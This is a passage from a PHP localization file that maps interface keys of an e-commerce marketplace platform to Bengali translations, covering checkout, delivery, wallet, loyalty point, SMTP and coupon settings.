তাদের অ্যাকাউন্টে ওয়ালেট বিকল্প থাকতে পারে এন্ড অর্ডার দেওয়ার সময় এন্ড রিফান্ড পাওয়ার সময় এটি ব্যবহার করতে পারে', 'if_enabled_customers_can_pay_through_different_payment_methods_outside_your_system' => 'এনাবল যদি গ্রাহকরা আপনার সিস্টেমের বাইরে বিভিন্ন অর্থ পেমেন্ট পদ্ধতির মাধ্যমে অর্থ পেমেন্ট করতে পারেন', 'if_enabled_customers_can_pay_through_external_payment_methods' => 'এনাবল যদি গ্রাহকরা বাহ্যিক অর্থ পেমেন্ট পদ্ধতির মাধ্যমে অর্থ পেমেন্ট করতে পারেন', 'if_enabled_customers_can_see_brands_on_the_app_and_website' => 'এনাবল যদি গ্রাহকরা অ্যাপ্লিকেশন এন্ড ওয়েবসাইটে ব্র্যান্ড দেখতে পারেন', 'if_enabled_customers_can_select_Cash_on_Delivery_as_a_payment_method_during_checkout' => 'এনাবল যদি গ্রাহকরা চেকআউট চলাকালীন অর্থ পেমেন্ট পদ্ধতি একাউন্টে ক্যাশ অন ডেলিভারি নির্বাচন করতে পারেন', 'if_enabled_customers_can_select_Digital_Payment_during_checkout' => 'এনাবল যদি গ্রাহকরা চেকআউট চলাকালীন ডিজিটাল পেমেন্ট নির্বাচন করতে পারেন', 'if_enabled_customers_can_use_this_payment_method' => 'এনাবল যদি গ্রাহকরা এই অর্থ পেমেন্ট পদ্ধতিটি ব্যবহার করতে পারেন', 'if_enabled_customers_must_order_over_the_minimum_amount_of_orders_that_admin_or_sellers_set' => 'এনাবল যদি গ্রাহকদের অবশ্যই অ্যাডমিন বা বিক্রেতাদের সেট করা ন্যূনতম পরিমাণ অর্ডারগুলি অর্ডার করতে হবে', 'if_enabled_customers_must_place_at_least_or_more_than_the_order_amount_that_admin_or_sellers_set' => 'এনাবল যদি গ্রাহকদের অবশ্যই অ্যাডমিন বা বিক্রেতাদের সেট করা অর্ডার পরিমাণের চেয়ে কমপক্ষে বা তার বেশি জায়গা রাখতে হবে', 'if_enabled_customers_will_receive_rewards_for_each_successful_referral' => 'এনাবল যদি গ্রাহকরা প্রতিটি সফল রেফারেলের জন্য পুরষ্কার পাবেন', 'if_enabled_deliveries_will_be_available_only_in_the_added_zip_code_areas' => 'যদি এনাবল করা ডেলিভারিস কেবল যুক্ত জিপ কোড অঞ্চলে এভেইল্যাবলে হবে', 'if_enabled_deliverymen_can_not_upload_picture_at_the_order_deliveries_time' => 'এনাবল যদি ডেলিভারিম্যানরা অর্ডার সরবরাহের সময় ছবি আপলোড করতে পারে না', 'if_enabled_deliverymen_can_upload_picture_at_the_order_deliveries_time' => 'এনাবল যদি ডেলিভারিম্যানরা অর্ডার সরবরাহের সময় ছবি আপলোড করতে পারে', 'if_enabled_deliverymen_must_verify_the_order_deliveries_by_collecting_the_OTP_from_customers' => 'এনাবল যদি ডেলিভারিম্যানদের অবশ্যই গ্রাহকদের কাছ থেকে ওটিপি সংগ্রহ করে অর্ডার ডেলিভারি যাচাই করতে হবে', 'if_enabled_everyone_can_see_the_App_Store_button_in_the_website_footer' => 'এনাবল হলে সবাই ওয়েবসাইটের ফুটারে অ্যাপ স্টোর বোতামটি দেখতে পারে', 'if_enabled_everyone_can_see_the_Google_Play_Store_button_in_the_website_footer' => 'এনাবল হলে সবাই ওয়েবসাইট ফুটারে গুগল প্লে স্টোর বোতামটি দেখতে পারে', 'if_enabled_free_delivery_will_be_available_when_customers_order_over_a_certain_amount' => 'এনাবল করা হলে গ্রাহকরা নির্দিষ্ট পরিমাণের অর্ডার দেওয়ার সময় বিনামূল্যে ডেলিভারি এভেইল্যাবলে হবে', 'if_enabled_sellers_can_register_by_themselves_from_website_or_app' => 'যদি এনাবল বিক্রেতারা ওয়েবসাইট বা অ্যাপ্লিকেশন থেকে নিজের দ্বারা নিবন্ধন করতে পারে', 'if_enabled_sellers_can_sell_digital_products' => 'যদি এনাবল হয় বিক্রেতারা ডিজিটাল পণ্য বিক্রি করতে পারেন', 'if_enabled_sellers_can_sell_digital_products_in_their_shops' => 'যদি এনাবল হয় বিক্রেতারা তাদের দোকানে ডিজিটাল পণ্য বিক্রি করতে পারে', 'if_enabled_sellers_can_send_registration_requests_to_admin' => 'যদি এনাবল বিক্রেতারা অ্যাডমিনে নিবন্ধকরণের অনুরোধগুলি প্রেরণ করতে পারেন', 'if_enabled_sellers_can_set_minimum_order_amount_for_their_stores_by_themselves' => 'যদি এনাবল বিক্রেতারা নিজেরাই তাদের স্টোরগুলির জন্য ন্যূনতম অর্ডার পরিমাণ নির্ধারণ করতে পারে', 'if_enabled_system_can_use_this_SMS_Gateway' => 'যদি এনাবল হয় সিস্টেম এই এসএমএস গেটওয়েটি ব্যবহার করতে পারে', 'if_enabled_the_Google_Play_Store_will_be_visible_in_the_website_footer_section' => 'এনাবল হলে গুগল প্লে স্টোর ওয়েবসাইট ফুটার ক্যাটাগরিে দৃশ্যমান হবে', 'if_enabled_the_billing_address_will_be_shown_on_the_checkout_page' => 'এনাবল করা হলে বিলিং ঠিকানা চেকআউট পৃষ্ঠায় প্রদর্শিত হবে', 'if_enabled_the_download_button_from_the_App_Store_will_be_visible_in_the_Footer_section' => 'এনাবল করা হলে অ্যাপ স্টোর থেকে ডাউনলোড বোতামটি ফুটার ক্যাটাগরিে দৃশ্যমান হবে', 'if_enabled_the_free_delivery_feature_will_be_shown_from_the_system' => 'এনাবল হলে বিনামূল্যে ডেলিভারি ফীচারটি সিস্টেম থেকে প্রদর্শিত হবে', 'if_enabled_the_loyalty_point_option_will_be_available_to_the_customers_account' => 'এনাবল হলে লয়াল্টি পয়েন্ট অপসনটি গ্রাহক অ্যাকাউন্টে এভেইল্যাবলে হবে', 'if_enabled_this_banner_will_be_available_on_the_website_and_customer_app' => 'এনাবল হলে এই ব্যানারটি ওয়েবসাইট এন্ড গ্রাহক অ্যাপে এভেইল্যাবলে হবে', 'if_enabled_this_coupon_will_be_available_on_the_website_and_customer_app' => 'এনাবল হলে এই কুপনটি ওয়েবসাইট এন্ড গ্রাহক অ্যাপে এভেইল্যাবলে হবে', 'if_enabled_this_customer_will_be_unblocked_and_can_log_in_to_this_system_again' => 'এনাবল হলে এই গ্রাহককে আনব্লক করা হবে এবং এই সিস্টেমে আবার লগ ইন করতে পারবে', 'if_enabled_this_deliveryman_can_log_in_to_the_system_and_deliver_products' => 'If enabled this deliveryman can log in to the system and deliver products', 'if_enabled_this_employee_can_log_in_to_the_system_and_perform_his_role' => 'এনাবল হলে এই কর্মচারী সিস্টেমে লগ ইন করতে এবং তার ভূমিকা পালন করতে পারে৷', 'if_enabled_this_language_will_be_available_throughout_the_entire_system' => 'এনাবল হলে এই ভাষাটি পুরো সিস্টেম জুড়ে এভেইল্যাবলে হবে', 'if_enabled_this_language_will_be_set_as_default_for_the_entire_system' => 'এনাবল হলে এই ভাষাটি পুরো সিস্টেমের জন্য ডিফল্ট একাউন্টে সেট করা হবে', 'if_enabled_this_product_will_be_available_on_the_website_and_customer_app' => 'এনাবল হলে এই পণ্যটি ওয়েবসাইট এন্ড গ্রাহক অ্যাপে এভেইল্যাবলে হবে', 'if_enabled_this_product_will_be_shown_in_the_featured_product_on_the_website_and_customer_app' => 'এনাবল হলে এই পণ্যটি ওয়েবসাইট এন্ড গ্রাহক অ্যাপে ফীচার পণ্যটিতে প্রদর্শিত হবে', 'if_enabled_this_support_ticket_will_be_active' => 'এনাবল হলে এই সাপোর্ট টিকিট সক্রিয় থাকবে', 'if_enabled_users_can_complete_the_checkout_process_without_logging_in_to_the_system' => 'যদি এনাবল ব্যবহারকারীরা সিস্টেমে লগ ইন না করে চেকআউট প্রক্রিয়াটি সম্পূর্ণ করতে পারেন', 'if_enabled_users_can_receive_verification_codes_on_their_registered_email_addresses' => 'এনাবল যদি ব্যবহারকারীরা তাদের নিবন্ধিত ইমেল ঠিকানাগুলিতে ভেরিফিকেশন কোডগুলি পেতে পারেন', 'if_enabled_users_can_receive_verification_codes_via_OTP_messages_on_their_registered_phone_numbers' => 'এনাবল যদি ব্যবহারকারীরা তাদের নিবন্ধিত ফোন নম্বরগুলিতে ওটিপি মেসেজগুলির মাধ্যমে ভেরিফিকেশন কোডগুলি পেতে পারেন', 'if_enabled_users_will_receive_verification_codes_on_their_registered_email_addresses' => 'এনাবল যদি ব্যবহারকারীরা তাদের নিবন্ধিত ইমেল ঠিকানাগুলিতে ভেরিফিকেশন কোডগুলি পাবেন', 'if_enabled_users_will_receive_verification_codes_on_their_registered_phone_numbers' => 'এনাবল যদি ব্যবহারকারীরা তাদের নিবন্ধিত ফোন নম্বরগুলিতে ভেরিফিকেশন কোডগুলি পাবেন', 'if_needed' => 'প্রয়োজন হলে', 'if_not _double-check_your_SMTP_settings_and_try_again' => 'যদি আপনার এসএমটিপি সেটিংস ডাবল-চেক না করে আবার চেষ্টা করুন', 'if_required' => 'যদি প্রয়োজন', 'if_sales_commission_is_disabled_here_the_system_default_commission_will_be_applied' => 'যদি বিক্রয় কমিশন এখানে ডিস্যাবল থাকে তবে সিস্টেম ডিফল্ট কমিশন প্রয়োগ করা হবে', 'if_successful _you_will_see_a_confirmation_message_indicating_that_the_connection_is_working_fine' => 'সফল হলে আপনি একটি নিশ্চিতকরণ মেসেজ দেখতে পাবেন যা ইঙ্গিত দেয় যে সংযোগটি ঠিকঠাক কাজ করছে', 'if_the_Customer_Loyalty_Point_option_is_disabled_above_all_settings_of_this_section_will_be_unavailable' => 'যদি গ্রাহকের লয়াল্টি পয়েন্ট অপসনটি এই ক্যাটাগরি সমস্ত সেটিংসের উপরে ডিস্যাবল থাকে তবে তা আনএভেইল্যাবল হবে', 'if_the_Customer_Wallet_option_is_disabled_above_all_settings_of_this_section_will_be_unavailable' => 'গ্রাহক ওয়ালেট অপসনটি যদি এই ক্যাটাগরি সমস্ত সেটিংসের উপরে ডিস্যাবল থাকে তবে তা আনএভেইল্যাবল থাকবে', 'if_the_SMTP_connection_test_is_successful _you_can_now_enable_the_mail_configuration_services_by_toggling_the_switch_to_ ON ' => 'যদি এসএমটিপি সংযোগ চেক সফল হয় তবে আপনি এখন স্যুইচটিতে টগল করে মেল কনফিগারেশন পরিষেবাগুলি এনাবল করতে পারেন', 'if_the_shipping_responsibility_is_inhouse_and_product_wise_shipping_is_activated_then_this_function_will_work' => 'যদি শিপিংয়ের দায়িত্ব ইনহাউস এন্ড পণ্য অনুসারে শিপিং সক্রিয় হয় তবে এই ফাংশনটি কার্যকর হবে', 'if_thermal_printer_is_ready' => 'তাপীয় প্রিন্টার যদি প্রস্তুত থাকে', 'if_you_change_addon_status' => 'আপনি যদি অ্যাডন স্ট্যাটাস পরিবর্তন করেন', 'if_you_change_from_on_theme_to_another_there_are_certain_changes_that_you_need_to_maintain_and_setup_data.' => 'আপনি যদি থিম থেকে অন্যটিতে পরিবর্তন করেন তবে নির্দিষ্ট কিছু পরিবর্তন রয়েছে যা আপনাকে ডেটা বজায় রাখতে এন্ড সেটআপ করতে হবে।', 'if_you_change_theme_from_theme_setup_these_banners_will_not_be_shown_in_changed_theme._You_have_upload_all_the_banners_over_again _according_to_the_new_theme_ratio_and_sizes._If_you_switch_back_to_' => 'আপনি যদি থিম সেটআপ থেকে থিম পরিবর্তন করেন তবে এই ব্যানারগুলি পরিবর্তিত থিমটিতে প্রদর্শিত হবে না। আপনি নতুন থিম অনুপাত এন্ড আকার অনুসারে আবার সমস্ত ব্যানার আপলোড করেছেন। আপনি যদি ফিরে যান', 'if_you_need_help' => 'আপনার যদি সাহায্যের প্রয়োজন হয়', 'if_you_require_any_assistance_or_have_feedback_or_suggestions_about_our_site_you_can_email_us_at' => 'আপনার যদি কোনও সহায়তার প্রয়োজন হয় বা আমাদের সাইট সম্পর্কে প্রতিক্রিয়া বা পরামর্শ থাকে তবে আপনি আমাদের ইমেল করতে পারেন', 'if_you_shift_in_another_theme' => 'আপনি যদি অন্য থিমে স্থানান্তরিত হন', 'if_you_want_to_add_fund_to_your_wallet_then_click_add_fund_button' => 'আপনি যদি আপনার ওয়ালেটে ফান্ড যুক্ত করতে চান তবে এড ফান্ড বোতামটি যুক্ত করুন ক্লিক করুন', 'if_you`re_not_sure_where_to_find_these_details _check_the_email_provider`s_documentation_or_support_resources_for_guidance' => 'আপনি যদি নিশ্চিত না হন যে এই ডিটেলসটি কোথায় পাবেন তা ইমেল সরবরাহকারীর ডকুমেন্টেশন বা গাইডেন্সের জন্য সাপোর্ট সংস্থানগুলি চেক করুন', 'if_you`re_unsure_about_the_SMTP_settings _contact_your_email_service_provider_or_IT_administrator_for_assistance' => 'আপনি যদি এসএমটিপি সেটিংস সম্পর্কে অনিশ্চিত থাকেন তবে সহায়তার জন্য আপনার ইমেল পরিষেবা সরবরাহকারী বা আইটি অ্যাডমিনের সাথে যোগাযোগ করুন', 'if_Flat _discount_amount_will_be_set_as_fixed_amount._If_Percentage _discount_amount_will_be_set_as_percentage.' => 'যদি ফ্ল্যাট ছাড়ের পরিমাণ স্থির পরিমাণ একাউন্টে সেট করা হবে। যদি শতাংশের ছাড়ের পরিমাণ শতাংশ একাউন্টে সেট করা হবে।', 'iframe_id' => 'আইফ্রেম আইডি', 'im_not_a_robot_checkbox' => 'আমি কোনও রোবট চেকবক্স নই', 'im_not_a_robot_checkbox ' => 'আমি কোনও রোবট চেকবক্স নই', 'image' => 'চিত্র', 'image_Upload' => 'চিত্র আপলোড', 'image_format' => 'চিত্র ফর্ম্যাট', 'image_is_required' => 'ইমেজ প্রয়োজন', 'image_ratio' => 'চিত্র অনুপাত', 'image_ratio_should_be' => 'চিত্র অনুপাত হওয়া উচিত', 'image_ration' => 'চিত্র রেশন', 'image_size' => 'ছবির আকার', 'image_size_must_be_within' => 'চিত্রের আকার অবশ্যই মধ্যে থাকতে হবে', 'image_type_must_be_within' => 'চিত্রের ধরণ অবশ্যই মধ্যে থাকতে হবে', 'images' => 'চিত্র', 'important' => 'গুরুত্বপূর্ণ', 'in' => 'ভিতরে', 'in-Hous_Products' => 'ইন-হাউস পণ্য', 'in-House' => 'ইন-হাউস', 'in-House_Earning' => 'ইন-হাউস উপার্জন', 'in-House_Shop' => 'ইন-হাউস শপ', 'in-Stock' => 'স্টক', 'in-house' => 'ইন-হাউস', 'in-house_Products' => 'ইন-হাউস পণ্য', 'in-house_earning' => 'ইন-হাউস উপার্জন', 'in_House' => 'ইন হাউস', 'in_House Orders' => 'বাড়ির অর্ডারে', 'in_House Products' => 'ঘরের পণ্যগুলিতে', 'in_House_Order' => 'বাড়ির অর্ডারে', 'in_House_Product_List' => 'ইন হাউস পণ্য তালিকায়', 'in_House_earning' => 'ইন হাউস উপার্জনে', 'in_Stock' => 'স্টক', 'in_about_section_select' => 'ক্যাটাগরিে নির্বাচন করুন', 'in_compare' => 'কম্পেয়ার', 'in_minute' => 'মিনিটে', 'in_seconds' => 'সেকন্ডেই', 'in_stock' => 'স্টক', 'in_the_system' => 'পদ্ধতিতে', 'in_their_shops' => 'তাদের দোকানে', 'in_these_cases_you_have_to_setup_data_for_those_features_after_changing_the_theme.' => 'এই ক্ষেত্রে থিমটি পরিবর্তন করার পরে আপনাকে সেই ফীচারগুলির জন্য ডেটা সেটআপ করতে হবে।', 'inactive' => 'নিষ্ক্রিয়', 'inactive_Products' => 'নিষ্ক্রিয় পণ্য', 'inbox' => 'ইনবক্স', 'include' => 'অন্তর্ভুক্ত', 'include_with_product' => 'পণ্য সঙ্গে অন্তর্ভুক্ত', 'incomplete_bank_info' => 'অসম্পূর্ণ ব্যাংক তথ্য', 'incomplete_info' => 'অসম্পূর্ণ তথ্য', 'info' => 'তথ্য', 'info_inquiry' => 'তথ্য তদন্ত', 'information' => 'তথ্য', 'inhouse' => 'ইনহাউস', 'inhouse_Sales' => 'ইনহাউস বিক্রয়', 'inhouse_orders_only' => 'শুধুমাত্র ইনহাউস অর্ডার', 'inhouse_product' => 'ইনহাউস পণ্য', 'inhouse_product_sale Report' => 'ইনহাউস পণ্য বিক্রয় প্রতিবেদন', 'inhouse_products' => 'ইনহাউস পণ্য', 'inhouse_sale' => 'ইনহাউস বিক্রয়', 'inhouse_shipping' => 'ইনহাউস শিপিং', 'inhouse_shipping_method' => 'ইনহাউস শিপিং পদ্ধতি', 'inhouse_shop' => 'ইনহাউস শপ', 'input if you want to change' => 'আপনি যদি পরিবর্তন করতে চান তবে ইনপুট করুন', 'input_Data' => 'তথ্য অন্তর্ভুক্তী', 'input_Field_Type' => 'ইনপুট ক্ষেত্রের ধরণ', 'input_field_Name' => 'ইনপুট ক্ষেত্রের নাম', 'input_if_you_want_to_change' => 'আপনি যদি পরিবর্তন করতে চান তবে ইনপুট করুন', 'input_png_or_jpg' => 'ইনপুট পিএনজি বা জেপিজি', 'inquiry' => 'সার্চ', 'instagram' => 'ইনস্টাগ্রাম', 'installments' => 'কিস্তি', 'instruction_will_be_available_very_soon' => 'নির্দেশ খুব শীঘ্রই এভেইল্যাবলে হবে', 'instructions' => 'নির্দেশাবলী', 'insufficient_point!' => 'অপর্যাপ্ত পয়েন্ট!', 'integration_id' => 'ইন্টিগ্রেশন আইডি', 'into_currency' => 'মুদ্রায়', 'invalid_access' => 'ইনভ্যালিড অ্যাক্সেস', 'invalid_coupon' => 'ইনভ্যালিড কুপন', 'invalid_customer_data' => 'ইনভ্যালিড গ্রাহক ডেটা', 'invalid_date_range' => 'ইনভ্যালিড তারিখের পরিসীমা', 'invalid_email_address' => 'অকার্যকর ইমেইল ঠিকানা', 'invalid_theme!' => 'ইনভ্যালিড থিম!', 'invalid_user' => 'ইনভ্যালিড ব্যবহারকারী', 'invite_Your_Friends_&_Businesses' => 'আপনার বন্ধুবান্ধব এন্ড ব্যবসায়গুলিকে আমন্ত্রণ জানান', 'invite_your_friends_&_businesses' => 'আপনার বন্ধুবান্ধব এন্ড ব্যবসায়গুলিকে আমন্ত্রণ জানান', 'invoice' => 'প্রিন্ট', 'invoice_to' => 'প্রিন্ট', 'is' => 'হয়', 'is_Required' => 'দরকার', 'issuer' => 'ইস্যুকারী', 'it is already refunded you can not change it!!' => 'এটি ইতিমধ্যে রিফান্ড দেওয়া হয়েছে আপনি এটি পরিবর্তন করতে পারবেন না !!', 'it_does_not_represent_the_Play_Store_or_App_Store_version' => 'এটি প্লে স্টোর বা অ্যাপ স্টোর সংস্করণ উপস্থাপন করে না', 'item' => 'আইটেম', 'item Details' => 'আইটেম ডিটেলস', 'item_Details' => 'আইটেম ডিটেলস', 'item_description' => 'বস্তুর বর্ণনা', 'item_details' => 'আইটেম ডিটেলস', 'item_discount' => 'আইটেম ছাড়', 'item_has_been_added_in_your_cart' => 'আপনার কার্টে আইটেম যুক্ত করা হয়েছে', 'item_has_been_removed_from_cart' => 'আইটেমটি কার্ট থেকে সরানো হয়েছে', 'item_has_been_removed_from_cart ' => 'আইটেমটি কার্ট থেকে সরানো হয়েছে', 'item_price' => 'আইটেমের দাম', 'items' => 'আইটেম', 'items found' => 'আইটেম পাওয়া গেছে', 'items_Price' => 'আইটেমের দাম', 'items_found' => 'আইটেম পাওয়া', 'jobs' => 'চাকরি', 'john_doe' => 'জন দো', 'joined' => 'যোগদান', 'joined_At' => 'যোগদান', 'just' => 'ঠিক', 'key' => 'চাবি', 'key_id' => 'কী আইডি', 'key_removed_successfully' => 'কী সফলভাবে সরানো হয়েছে', 'key_translated_successfully' => 'কী সফলভাবে অনুবাদ', 'label' => 'লেবেল', 'language' => 'ভাষা', 'language_Translate' => 'ভাষা অনুবাদ', 'language_content_table' => 'ভাষার সামগ্রী টেবিল', 'language_setting' => 'ভাষা সেটিং', 'language_table' => 'ভাষা টেবিল', 'languages' => 'ভাষা', 'last' => 'শেষ', 'last_Name' => 'নামের শেষাংশ', 'last_Updated_Stock' => 'সর্বশেষ আপডেট স্টক', 'last_name' => 'নামের শেষাংশ', 'last_updated' => 'সর্বশেষ সংষ্করণ', 'latest' => 'সর্বশেষ', 'latest_product' => 'সর্বশেষ পণ্য', 'latest_products' => 'সাম্প্রতিক পণ্যসমূহ', 'latitude' => 'অক্ষাংশ', 'leave_a_Message' => 'একটি মেসেজ রেখে যান', 'leave_a_comment' => 'মতামত দিন', 'leave_your_issue' => 'আপনার ইস্যু বলুন', 'left' => 'বাম', 'left sidebar' => 'বাম সাইডবার', 'let_me_check' => 'যাচাই করতে দাও', 'license' => 'লাইসেন্স', 'light' => 'লাইট', 'like_for_BD_880' => 'বিডি 880 এর জন্য পছন্দ করুন', 'limit' => 'সীমা', 'limit_for_same_user' => 'একই ব্যবহারকারীর জন্য সীমা', 'limit_for_same_user_is_required' => 'একই ব্যবহারকারীর জন্য সীমা প্রয়োজন', 'limit_for_same_user_is_required!' => 'একই ব্যবহারকারীর জন্য সীমা প্রয়োজন!', 'limited_Sotcks' => 'সীমাবদ্ধ sotcks', 'limited_Stock' => 'সীমিত সংখ্যক', 'limited_Stocks' => 'সীমিত স্টক', 'limited_stock' => 'সীমিত সংখ্যক', 'link' => 'লিঙ্ক', 'linkedIn' => 'লিঙ্কডইন', 'linked_orders' => 'লিঙ্কযুক্ত অর্ডার', 'linkedin' => 'Linkedin', 'liqpay' => 'liqpay', 'list' => 'তালিকা', 'list_of_hold_orders' => 'হোল্ড অর্ডার তালিকা', 'live' => 'লাইভ দেখান', 'live_chat' => 'সরাসরি কথোপকথন', 'loader_gif' => 'লোডার জিআইএফ', 'loading_Gif' => 'জিআইএফ লোড হচ্ছে', 'location' => 'লোকেশন', 'location_Data' => 'লোকেশন ডেটা', 'location_data' => 'লোকেশন ডেটা', 'login' => 'লগইন করুন', 'login_Url_Setup' => 'লগইন ইউআরএল সেটআপ', 'login_first' => 'প্রথমে লগইন করুন', 'login_first_for_next_steps' => 'পরবর্তী পদক্ষেপের জন্য প্রথমে লগইন করুন', 'login_for_add_to_cart' => 'কার্টে যোগ করার জন্য লগইন করুন', 'login_successful' => 'সফল লগইন', 'login_to_your_account' => 'আপনার অ্যাকাউন্টে লগ ইন করুন', 'login_to_your_account.' => 'আপনার অ্যাকাউন্টে লগ ইন করুন.', 'login_to_your_seller_account' => 'আপনার বিক্রেতা অ্যাকাউন্টে লগইন করুন', 'login_to_your_seller_account.' => 'আপনার বিক্রেতা অ্যাকাউন্টে লগইন করুন।', 'logo' => 'লোগো', 'logo_name_is_required' => 'লোগোর নাম আবশ্যক', 'logout' => 'লগ আউট', 'longitude' => 'দ্রাঘিমাংশ', 'low' => 'কম', 'low_high' => 'কম বেশি', 'low_to_High_Price' => 'কম থেকে উচ্চ মূল্য', 'low_to_high_price' => 'কম থেকে উচ্চ মূল্য', 'lowest_Products' => 'সর্বনিম্ন পণ্য', 'loyalty point' => 'লয়াল্টি পয়েন্ট', 'loyalty point transa...' => 'লয়াল্টি পয়েন্ট ট্রান্সা ...', 'loyalty_Point_Earn_on_Each_Order' => 'প্রতিটি অর্ডারে লয়াল্টি পয়েন্ট উপার্জন', 'loyalty_Points' => 'লয়াল্টি পয়েন্ট', 'loyalty_point' => 'লয়াল্টি পয়েন্ট', 'loyalty_point_history' => 'লয়াল্টি পয়েন্ট ইতিহাস', 'loyalty_point_to_wallet' => 'লয়াল্টি পয়েন্ট টু ওয়ালেট', 'mail' => 'মেল', 'mail_Config' => 'মেল কনফিগার', 'mail_config' => 'মেল কনফিগার', 'mail_configuration' => 'মেল কনফিগারেশন', 'mail_received_successfully' => 'মেল সফলভাবে প্রাপ্ত', 'mail_template' => 'মেল টেমপ্লেট', 'mail_us' => 'আমাদের মেইল', 'mailer_name' => 'মেলারের নাম', 'main' => 'প্রধান', 'main_Banner' => 'প্রধান ব্যানার', 'main_Section_Banner' => 'মূল ক্যাটাগরি ব্যানার', 'main_banner_form' => 'প্রধান ব্যানার ফর্ম', 'maintenance_mode' => 'রক্ষণাবেক্ষণ মোড', 'maintenance_mode_activated_for_others_you_can_update_now' => 'রক্ষণাবেক্ষণ মোড অন্যদের জন্য সক্রিয় আপনি এখন আপডেট করতে পারেন', 'make_sure_to_check' => 'চেক করে দেখুন', 'manage_deliveries' => 'ডেলিভারি পরিচালনা', 'map_api_hint' => 'এনবি: ক্লায়েন্ট কীটি এমএপি জাভাস্ক্রিপ্ট এপিআই এনাবল করা উচিত এন্ড আপনি এটি এইচটিটিপি রেফারির সাথে সীমাবদ্ধ করতে পারেন। সার্ভার কী প্লেস এপিআই কী এনাবল করা উচিত এন্ড আপনি এটি আইপি দিয়ে সীমাবদ্ধ করতে পারেন।', 'map_api_hint_2' => 'মানচিত্র এপিআই ইঙ্গিত 2', 'map_api_key' => 'মানচিত্র এপিআই কী', 'marketing' => 'মার্কেটিং', 'marketing section' => 'মার্কেটিং ক্যাটাগরি', 'marketing_section' => 'মার্কেটিং ক্যাটাগরি', 'master_card_number' => 'মাস্টার কার্ড নম্বর', 'max' => 'সর্বোচ্চ', 'maximum Login hit' => 'সর্বাধিক লগইন হিট', 'maximum OTP hit' => 'সর্বাধিক ওটিপি হিট', 'maximum discount' => 'সর্বাধিক ছাড়', 'maximum_Add_Fund_Amount' => 'সর্বাধিক সংযোজন ফান্ডের পরিমাণ', 'maximum_bonus' => 'ম্যাক্সিমাম বোনাস', 'maximum_discount' => 'সর্বাধিক ছাড়', 'maximum_discount ($)' => 'সর্বাধিক ছাড় ($)', 'maximum_file_size' => 'সর্বাধিক ফাইলের আকার', 'maximum_quantity_270' => 'সর্বোচ্চ পরিমাণ 270', 'maximum_size' => 'সর্বাধিক আকার', 'measurement_ID' => 'পরিমাপ আইডি', 'medium' => 'মধ্যম', 'mercadopago' => 'mercadopago', 'merchantEmail' => 'মার্চেন্টমেল', 'merchant_Email' => 'বণিক ইমেল', 'merchant_ID' => 'মার্চেন্ট আইডি', 'merchant_code' => 'মার্চেন্ট কোড', 'message' => 'মেসেজ', 'message_from_delivery_man' => 'ডেলিভারি ম্যান থেকে মেসেজ', 'message_from_seller' => 'বিক্রেতার কাছ থেকে মেসেজ', 'messages' => 'মেসেজ', 'messaging_sender_id' => 'মেসেজিং প্রেরক আইডি', 'messaging_service_sid' => 'মেসেজিং সার্ভিস SID', 'messenger' => 'মেসেঞ্জার', 'meta_Description' => 'মেটা বর্ণনা', 'meta_Image' => 'মেটা চিত্র', 'meta_Title' => 'মেটা শিরোনাম', 'meta_description' => 'মেটা বর্ণনা', 'meta_image' => 'মেটা চিত্র', 'meta_title' => 'মেটা শিরোনাম', 'method' => 'পদ্ধতি', 'method_fields' => 'পদ্ধতি ক্ষেত্র', 'method_name' => 'পদ্ধতির নাম', 'methods' => 'পদ্ধতি', 'middle' => 'মাজারি', 'min' => 'মিনিট', 'minimum point for convert to currency is = ' => 'মুদ্রায় রূপান্তর করার জন্য সর্বনিম্ন পয়েন্ট ', 'minimum purchase' => 'ন্যূনতম ক্রয়', 'minimum_' => 'সর্বনিম্ন', 'minimum_8_characters_long' => 'সর্বনিম্ন 8 অক্ষর দীর্ঘ', 'minimum_Add_Fund_Amount' => 'ন্যূনতম ফান্ডের পরিমাণ', 'minimum_Customer_App_Version' => 'সর্বনিম্ন গ্রাহক অ্যাপ সংস্করণ', 'minimum_Deliveryman_App_Version' => 'সর্বনিম্ন ডেলিভারি অ্যাপ্লিকেশন সংস্করণ', 'minimum_Order_Amount' => 'সর্বনিম্ন অর্ডার পরিমাণ', 'minimum_Point_Required_To_Convert' => 'রূপান্তর করতে ন্যূনতম পয়েন্ট প্রয়োজন', 'minimum_Seller_app_version' => 'সর্বনিম্ন বিক্রেতা অ্যাপ্লিকেশন সংস্করণ', 'minimum_add_amount' => 'ন্যূনতম যোগ পরিমাণ', 'minimum_amount_can_not_be_greater_than_maximum_amount' => 'সর্বনিম্ন পরিমাণ সর্বোচ্চ পরিমাণের চেয়ে বেশি হতে পারে না', 'minimum_order_amount' => 'সর্বনিম্ন অর্ডার পরিমাণ', 'minimum_order_qty' => 'সর্বনিম্ন অর্ডার পরিমান', 'minimum_order_quantity' => 'ন্যূনতম চাহিদার পরিমাণ', 'minimum_order_quantity_cannot_be_less_than' => 'ন্যূনতম অর্ডার পরিমাণ কম থেকে হতে পারে না', 'minimum_order_quantity_cannot_be_less_than_' => 'সর্বনিম্ন অর্ডার পরিমাণের চেয়ে কম হতে পারে না', 'minimum_point_for_convert_to_currency_is' => 'ন্যূনতম পয়েন্ট ফর কনভার্ট টু কারেন্সি', 'minimum_point_for_convert_to_currency_is = ' => 'মুদ্রায় রূপান্তর করার জন্য সর্বনিম্ন পয়েন্ট হল', 'minimum_point_to_transfer' => 'স্থানান্তর ন্যূনতম পয়েন্ট', 'minimum_purchase' => 'ন্যূনতম ক্রয়', 'minimum_purchase ($)' => 'ন্যূনতম ক্রয় ($)', 'minimum_purchase_is_required' => 'সর্বনিম্ন ক্রয় প্রয়োজন', 'minimum_purchase_is_required!' => 'সর্বনিম্ন ক্রয় প্রয়োজন!', 'minimum_stock_limit_for_warning' => 'সতর্কতার জন্য সর্বনিম্ন স্টক সীমা', 'minutes' => 'মিনিট', 'mobile_no' => 'মোবাইল নাম্বার', 'mobile_number' => 'মোবাইল নম্বর', 'module' => 'মডিউল', 'module_permission' => 'মডিউল অনুমতি', 'modules' => 'মডিউল', 'money_back_guarantee' => 'টাকা রিফান্ড গ্যারান্টি', 'money_back_gurranty' => 'অর্থ রিফান্ড গুরান্টি', 'more' => 'আরও', 'more_From_The_Store' => 'স্টোর থেকে আরও', 'more_stores' => 'আরও স্টোর', 'most favorite' => 'মোস্ট ফেভারিট', 'most-demanded_product_deleted_successfully' => 'সর্বাধিক-ডেম্যান্ডেড পণ্য সফলভাবে মুছে ফেলা হয়েছে', 'most-favorite' => 'মোস্ট ফেভারিট', 'most_Popular_Stores' => 'সর্বাধিক জনপ্রিয় স্টোর', 'most_demanded' => 'সর্বাধিক 